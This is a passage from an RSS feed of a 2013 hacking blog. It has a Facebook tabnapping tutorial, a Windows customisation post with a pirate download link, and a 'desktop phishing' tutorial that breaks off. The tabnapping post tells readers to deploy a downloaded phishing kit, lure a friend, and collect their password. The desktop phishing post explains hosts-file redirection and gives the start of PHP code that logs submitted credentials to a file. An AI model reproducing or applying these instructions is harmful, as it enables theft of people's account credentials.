href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5Zr0mBCy1OIXRWAJ56PYQExEFz4uBiqY24RnTkK4TWRe4a7j4MnoqlfYB4FNAjbAdBUtN_7Il9d5YKvgOJ93IAFVmAnNUTOmi-2Fmqz7HJx2wr8CFs6U_4GATj8Bi7rANHaIVQ3RednD/s1600/Screenshot_2013-11-15-15-12-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji5Zr0mBCy1OIXRWAJ56PYQExEFz4uBiqY24RnTkK4TWRe4a7j4MnoqlfYB4FNAjbAdBUtN_7Il9d5YKvgOJ93IAFVmAnNUTOmi-2Fmqz7HJx2wr8CFs6U_4GATj8Bi7rANHaIVQ3RednD/s1600/Screenshot_2013-11-15-15-12-44.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: georgia,serif; font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;Actually the game is very dificult and he/she will not win in less time  and  he/she will goto another tab in browser like  facebook,google,youtube ,yahoo etc and when he/she came back to the  website , it will be automatically redirected and saying them to login  with facebook account to continue&lt;/span&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5M26slt0CbN7keEHOpAqZRgl257PE5flmFRThswLFnITBtryeapQPM1CdgGD-6qOdbywowYtNOlgSQ3cWqnhtJSJN8kSAfkl_S47sBghFP8zprNmISbRfA14ssjIZQ7jSH9Iw_Yv6tNUh/s1600/Screenshot_2013-11-15-15-13-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5M26slt0CbN7keEHOpAqZRgl257PE5flmFRThswLFnITBtryeapQPM1CdgGD-6qOdbywowYtNOlgSQ3cWqnhtJSJN8kSAfkl_S47sBghFP8zprNmISbRfA14ssjIZQ7jSH9Iw_Yv6tNUh/s1600/Screenshot_2013-11-15-15-13-01.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj21tXjLODPPjzHtpMKVkeAmlF63qcLa0cDw99XcQaPyXzszND4-4GKeZBI1lJun6idxs2ziHema2bEusgvT6pDfrGGb4VQU6kCLKLWAAwWaxO7VzVLx5zCA9sOH4Y9ydhyphenhyphenBPmllA-zfcc1/s1600/Screenshot_2013-11-15-15-16-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj21tXjLODPPjzHtpMKVkeAmlF63qcLa0cDw99XcQaPyXzszND4-4GKeZBI1lJun6idxs2ziHema2bEusgvT6pDfrGGb4VQU6kCLKLWAAwWaxO7VzVLx5zCA9sOH4Y9ydhyphenhyphenBPmllA-zfcc1/s1600/Screenshot_2013-11-15-15-16-08.png" height="320" width="192" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;When your victim log in with facebook account then her/his password will  saved in your website and he/she will be redirected to main game page.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;Now just open=======http://www.your-website.com/fb/password.html------and you will see the email and passwords.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;Thanks for Watching &lt;/span&gt;&lt;ul&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: georgia,serif;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family: georgia,serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6o1aQ-0f-wDiNlHMTLZ72wPwZqdIMRdj_UnwPFyxe0rHHNeQaMiLRkJmUnaMdgABAOQyuXg94ckZvJqTxKGg2HyhDud_pXbjmCn0EjRNoTgvMyNGUdCgwkX348zkZijCye5c4h3JsSg3d/s72-c/Screenshot_2013-11-15-15-12-54.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="-1" type="application/json" url="https://www.dropbox.com/s/zqqhhiz8q91ee2d/Prophet.rar"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>HI this is&amp;nbsp; Prophet ...Today I tell you how can you hack facebook account with tabnpping.. Tab Napping&amp;nbsp;&amp;nbsp;Tabnapping is a new form of phishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page. How does it works Tab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressing CTRL&amp;nbsp;+ T).&amp;nbsp;if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping. Steps First of all you have a web hosting site and if&amp;nbsp; you don't have then you create a free web hosting site on&amp;nbsp;000webhost .&amp;nbsp;&amp;nbsp; &amp;nbsp;Now download the phishing and script here.DownloadUpload all the files and folders to your website.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.&amp;nbsp;Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue &amp;nbsp;When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.&amp;nbsp;Now just open=======http://www.your-website.com/fb/password.html------and you will see the email and passwords.&amp;nbsp;Thanks for Watching &amp;nbsp;</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>HI this is&amp;nbsp; Prophet ...Today I tell you how can you hack facebook account with tabnpping.. Tab Napping&amp;nbsp;&amp;nbsp;Tabnapping is a new form of phishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page. How does it works Tab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressing CTRL&amp;nbsp;+ T).&amp;nbsp;if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping. Steps First of all you have a web hosting site and if&amp;nbsp; you don't have then you create a free web hosting site on&amp;nbsp;000webhost .&amp;nbsp;&amp;nbsp; &amp;nbsp;Now download the phishing and script here.DownloadUpload all the files and folders to your website.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.&amp;nbsp;Actually the game is very dificult and he/she will not win in less time and he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue &amp;nbsp;When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.&amp;nbsp;Now just open=======http://www.your-website.com/fb/password.html------and you will see the email and passwords.&amp;nbsp;Thanks for Watching &amp;nbsp;</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><title>Customize your computer like Hacker</title><link>http://bambahacks.blogspot.com/2013/11/customize-your-computer-like-hacker.html</link><category>Windows Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Thu, 14 Nov 2013 02:41:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-3267580460706941304</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;In this&amp;nbsp; post , I tell you how can you make your computer&amp;nbsp; look like hacker.&lt;/div&gt;&lt;div style="text-align: left;"&gt;On Internet many softwares are come but only&amp;nbsp; some are useful.&lt;/div&gt;&lt;div style="text-align: left;"&gt;Now I tell you best of them&amp;nbsp;&lt;/div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;h4&gt;&lt;span style="font-size: large;"&gt;Rainmeter&amp;nbsp;&lt;/span&gt;&lt;/h4&gt;&lt;div style="text-align: justify;"&gt;Rainmeter skins are helping you to get  all the notification of your computers just on the desktop. Rainmeter  themes are one kind of features that show you all the computers  performance and all the running applications and functions like music  player and song which you are listening at a time, CPU performance  graph, CPU temperature, RAM’s used and performance, if viruses are  affects on your computer that’s also can show instantly on your desktop,  all the images you are most used watched or edits, HTML links which you  are using mostly, just common but useful time and date with extra  functions and Google calendars, weather reports with manually setting  features, news feeds which you sets for getting instantly updates, all  the computer desktop shortcut icons and folders, very useful notes which  you have set for remember any things, what other family members or  friends worked and used your computer and many more applications and  features.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Rainmeter skins provide us best and most  useful desktop customization tools. Oh sorry! , not only most useful  but it’s provide all of the customization tools and setting that catch  your eyes easily. Rainmeter themes gives us an extra graphic designed  new looks of our desktop. Rainmeter skins not load more to increase your  CPU used, it’s also providing lighted installation even with extra  graphics looks.&lt;/div&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://rainmeter.net/cms/" target="_blank"&gt;Download&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/h4&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This is software now you find a better skin for this..one of my favorite is this&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Ec8CXSAEbrY6uHKQHXarnXGYoFVXCjytmHFRMQXbOks3yTVmtiFDgcCD90W0KHdQWgr40yqzoF79tBBUqmwvxu9PfwSQYWu9qCyWWhlUxe4DhXyUT_A6SVdg4xaXsRCZPL28NHABvuEU/s1600/104467.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Ec8CXSAEbrY6uHKQHXarnXGYoFVXCjytmHFRMQXbOks3yTVmtiFDgcCD90W0KHdQWgr40yqzoF79tBBUqmwvxu9PfwSQYWu9qCyWWhlUxe4DhXyUT_A6SVdg4xaXsRCZPL28NHABvuEU/s1600/104467.jpg" height="223" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;h4&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;a href="http://fc03.deviantart.net/fs71/f/2013/232/5/c/ironman_j_a_r_v_i_s____s_h_i_e_l_d__o_s__by_yash1331-d5ejtop.rmskin" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/h4&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;You find more skin at&amp;nbsp;&lt;a href="http://www.deviantart.com/" target="_blank"&gt;Devianart&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;h2&gt;&lt;span style="font-size: large;"&gt;Window Blind&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeyMkwHdRFPI5Jdc7NpOxl0loNKF7NWwp_faKEw1rwJ81-JvBtE8M9b5xt4Q8YtONoKjoBFkejTHLLkAE-SAE-SbenGJMKZlCmPGqNVK8dhIZV-FWmhcQqqvh2gZ8savOIkLRVBl2h-DO/s1600/Win8MetroPage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeyMkwHdRFPI5Jdc7NpOxl0loNKF7NWwp_faKEw1rwJ81-JvBtE8M9b5xt4Q8YtONoKjoBFkejTHLLkAE-SAE-SbenGJMKZlCmPGqNVK8dhIZV-FWmhcQqqvh2gZ8savOIkLRVBl2h-DO/s1600/Win8MetroPage.jpg" height="203" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://cache.filehippo.com/img/ex/1468__WindowBlinds7_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://cache.filehippo.com/img/ex/1468__WindowBlinds7_2.png" height="220" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBpwOWff7Kc7EDW1nZin0eeMPaqtG3BWK_FVZeXY7JsUSmqUtKT5oTk6fhGwMbvhYUNBVOaNP2C4OztTSRkBpNJxRiLLgULxyeUO9OtE_-PWL3WXawRmgbkGlCOhcUyTCyuKRmUBPn8Bov/s1600/url.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBpwOWff7Kc7EDW1nZin0eeMPaqtG3BWK_FVZeXY7JsUSmqUtKT5oTk6fhGwMbvhYUNBVOaNP2C4OztTSRkBpNJxRiLLgULxyeUO9OtE_-PWL3WXawRmgbkGlCOhcUyTCyuKRmUBPn8Bov/s1600/url.jpg" height="223" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div id="txt"&gt;&lt;span itemprop="description"&gt;WindowBlinds is a software utility that allows you to completely change the look and feel of Microsoft Windows.&lt;br /&gt; It works by applying new visual styles, called skins, across the  entire user interface (title bars, push buttons, start menu, taskbar,  etc.) of the operating system. As a result, you gain complete control  over the way Windows looks.&lt;br /&gt; As good as someone might think Windows looks, it is a one-size fits  all solution. WindowBlinds gives users thousands of new looks to choose  from.&lt;br /&gt;  With skins, WindowBlinds can change the look of:&lt;br /&gt; &lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;span itemprop="description"&gt;&lt;li&gt;Title bars &lt;/li&gt;&lt;li&gt;Borders &lt;/li&gt;&lt;li&gt;The Start bar &lt;/li&gt;&lt;li&gt;Progress animations &lt;/li&gt;&lt;li&gt;Explorer Views &lt;/li&gt;&lt;/span&gt;&lt;/ul&gt;&lt;span itemprop="description"&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span itemprop="description"&gt;and virtually every other part of Windows!&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://www.filehippo.com/download_windowblinds/" target="_blank"&gt;Download&lt;a name='more'&gt;&lt;/a&gt;&lt;/a&gt;&lt;/span&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;WindowFX&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;Revolutionize your operating system with WindowFX. Utilize an  unprecedented number of special effects for your windows and maximize  your computing experi&lt;b&gt;ance&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Screen Resizing: Enjoy time-saving window management features such as screen border resizing and window border maximizing.&lt;/li&gt;&lt;li&gt;Advanced Controls: Get more from the right-click menu with advanced controls.&lt;/li&gt;&lt;li&gt;Apply  custom animations: Pick different animated effects for windows when  they open, close, minimize and restore. (Requires Windows 7 or Vista  with the DWM enabled)&lt;/li&gt;&lt;li&gt;Add more to your movements: Add  Windows Flick actions to movements, fade windows when moving and add  momentum so you can throw windows around on your monitor.&lt;/li&gt;&lt;li&gt;Remain  focused on the task at hand: Make the active window stand out, make  inactive windows fade away and automatically minimize background  windows.&lt;/li&gt;&lt;/ul&gt;Don&#146;t lose your videos: On a multiple-monitor  systems, keep Flash® videos fullscreen when you use apps on other  monitors. Don&#146;t let your video close simply because you&#146;re working on  your other monitor&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.stardock.com/products/windowfx/images/screenshots/inaction_01_lg.png" imageanchor="1"&gt;&lt;img border="0" src="http://www.stardock.com/products/windowfx/images/screenshots/inaction_01_lg.png" height="200" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://t1.gstatic.com/images?q=tbn:ANd9GcSn2jO-Gc0ovL73whYHH_YvcXYh95tquDx8cg_XjjdVXZRuiK9Dcw" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://t1.gstatic.com/images?q=tbn:ANd9GcSn2jO-Gc0ovL73whYHH_YvcXYh95tquDx8cg_XjjdVXZRuiK9Dcw" height="310" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://t1.gstatic.com/images?q=tbn:ANd9GcRbgArmqHGsyiQUOo073qOgtsgYNFEm3QnZEzsq0-h1Km2ydMIs" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://t1.gstatic.com/images?q=tbn:ANd9GcRbgArmqHGsyiQUOo073qOgtsgYNFEm3QnZEzsq0-h1Km2ydMIs" height="199" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;a href="http://thepiratebay.sx/torrent/7936954/" target="_blank"&gt;Download&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-size: large;"&gt;Thanks , for seeing my post..... &lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Ec8CXSAEbrY6uHKQHXarnXGYoFVXCjytmHFRMQXbOks3yTVmtiFDgcCD90W0KHdQWgr40yqzoF79tBBUqmwvxu9PfwSQYWu9qCyWWhlUxe4DhXyUT_A6SVdg4xaXsRCZPL28NHABvuEU/s72-c/104467.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hack a Facebook via a Desktop Phishing</title><link>http://bambahacks.blogspot.com/2013/11/hack-facebook-via-desktop-phishing.html</link><category>FB Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 13 Nov 2013 02:31:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-2778232756535716236</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;h2 style="background-color: white; border: 0px; font-size: 26px; font-weight: normal; letter-spacing: -1px; line-height: 30px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 600px;"&gt;&lt;span style="color: red;"&gt;Desktop Phishing - Step by step tutorial&lt;/span&gt;&lt;/h2&gt;&lt;div&gt;&lt;div style="background-color: white; border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;In desktop phishing:-&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: white; border: 0px; clear: both; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;"&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;1&lt;/b&gt;. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.&lt;/div&gt;&lt;div style="background-color: white; border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;2&lt;/b&gt;. Victim types &amp;nbsp;the domain name of orignal/genuine website and is taken to our fake login page.&amp;nbsp;But the domain name remains the same as typed by victim and victim doesn't come to know.&lt;/div&gt;&lt;div style="background-color: white; border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;3&lt;/b&gt;. Rest of the things are same as in normal phishing.&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;What is Hosts File ?&lt;/b&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br style="margin: 0px; padding: 0px;" /&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;The hosts file &amp;nbsp;is a text file containing domain names&amp;nbsp;and IP address associated with them.&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Location of hosts file in windows: C:\Windows\System32\drivers\etc\&lt;/span&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Whenever we visit any website, say www.anything.com , an query is sent to &amp;nbsp;Domain Name Server(DNS) to &amp;nbsp;look up for the IP address associated with that website/domain. But before doing this the hosts file&amp;nbsp;on our local computer is checked for the IP address associated to the domain name.&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br style="margin: 0px; padding: 0px;" /&gt;&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;be taken to this 115.125.124.50. No query for resolving IP address&amp;nbsp;associated with www.anywebsite.com would be sent to DNS.&lt;/div&gt;&lt;div style="border: 0px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4 style="font-family: 'Lucida Grande',Arial,Helvetica,sans-serif; font-size: 13px; line-height: 22px;"&gt;What we need ?&lt;/h4&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;h3&gt;&lt;span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 22px;"&gt;&lt;span style="font-size: small;"&gt;Xampp&lt;/span&gt;&amp;nbsp;&lt;a href="http://www.apachefriends.org/en/xampp-windows.html" target="_blank"&gt;Download Here&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h4&gt;&lt;span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 22px;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style="font-size: small;"&gt;&amp;nbsp;&amp;nbsp; 2.&amp;nbsp; Phishing Script&lt;/span&gt; &lt;a href="https://db.tt/Pml38iuS" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="container"&gt;&lt;div class="line number1 index0 alt2"&gt;&lt;code class="php plain"&gt;&amp;lt;?php &lt;/code&gt;&lt;/div&gt;&lt;div class="line number2 index1 alt1"&gt;&lt;code class="php plain"&gt;header (&lt;/code&gt;&lt;code class="php string"&gt;'Location: &lt;a href="http://rmar.in/"&gt;http://www.facebook.com&lt;/a&gt;'&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number3 index2 alt2"&gt;&lt;code class="php variable"&gt;$handler&lt;/code&gt; &lt;code class="php plain"&gt;= &lt;/code&gt;&lt;code class="php functions"&gt;fopen&lt;/code&gt;&lt;code class="php plain"&gt;(&lt;/code&gt;&lt;code class="php string"&gt;"fake.txt"&lt;/code&gt;&lt;code class="php plain"&gt;, &lt;/code&gt;&lt;code class="php string"&gt;"a"&lt;/code&gt;&lt;code class="php plain"&gt;); &lt;/code&gt;&lt;/div&gt;&lt;div class="line number4 index3 alt1"&gt;&lt;code class="php keyword"&gt;foreach&lt;/code&gt;&lt;code class="php plain"&gt;(&lt;/code&gt;&lt;code class="php variable"&gt;$_POST&lt;/code&gt; &lt;code class="php keyword"&gt;as&lt;/code&gt; &lt;code class="php 